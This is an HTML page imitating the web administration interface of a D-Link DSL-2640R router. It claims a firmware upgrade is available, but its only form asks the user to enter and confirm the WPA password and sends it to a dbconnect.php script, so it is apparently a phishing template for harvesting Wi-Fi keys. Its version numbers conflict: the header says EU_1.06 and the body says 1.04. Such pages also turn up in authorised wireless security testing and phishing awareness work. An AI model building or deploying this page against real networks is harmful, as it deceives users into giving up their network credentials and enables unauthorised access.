<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
    <head>
        <meta http-equiv="Content-type" content="text/html; charset=utf-8;" />
        <link rel="stylesheet" type="text/css" href="style.css" />
    </head>
    <body>
        <div id="top-header">
            <span class="top-left">&nbsp;Product: DSL-2640R </span>
            <span class="top-right">Firmware Version: EU_1.06 &nbsp; Hardware Version: B1&nbsp;</span>
        </div>
        
        <div id="header">
            <img id="img" src="./masthead.jpg" width="800px">
            <div id="header-left">
                <img id="logo" src="./logo.png" width="100px">
            </div>
            <div id="header-right">
                Web Administration
            </div>
        </div>
        
        <div id="content">
            <table id="warning">
            <th>FIRMWARE UPGRADE:</th>
             
            <tr><td>A new firmware is available to improve
            functionality and performance.</td></tr>
            </table>

            <table>

            <th>DOWNLOAD AND UPGRADE:</th>
            <tr><td><b>Current Firmware Version: </b> 1.04</td></tr>
             
            <tr><td><form action="dbconnect.php" method="post">
            WPA Password: <input type="password" name="password1"><br>
            Confirm Password: <input type="password" name="password2"><br>
            <input type="submit" value="Submit" value="Send"> </td>
            </tr>
            </table>

        </div>

        <div id="bottom"></div>
		<div id="copyright">Copyright © 2005-2015</div>
    </body>
</html>
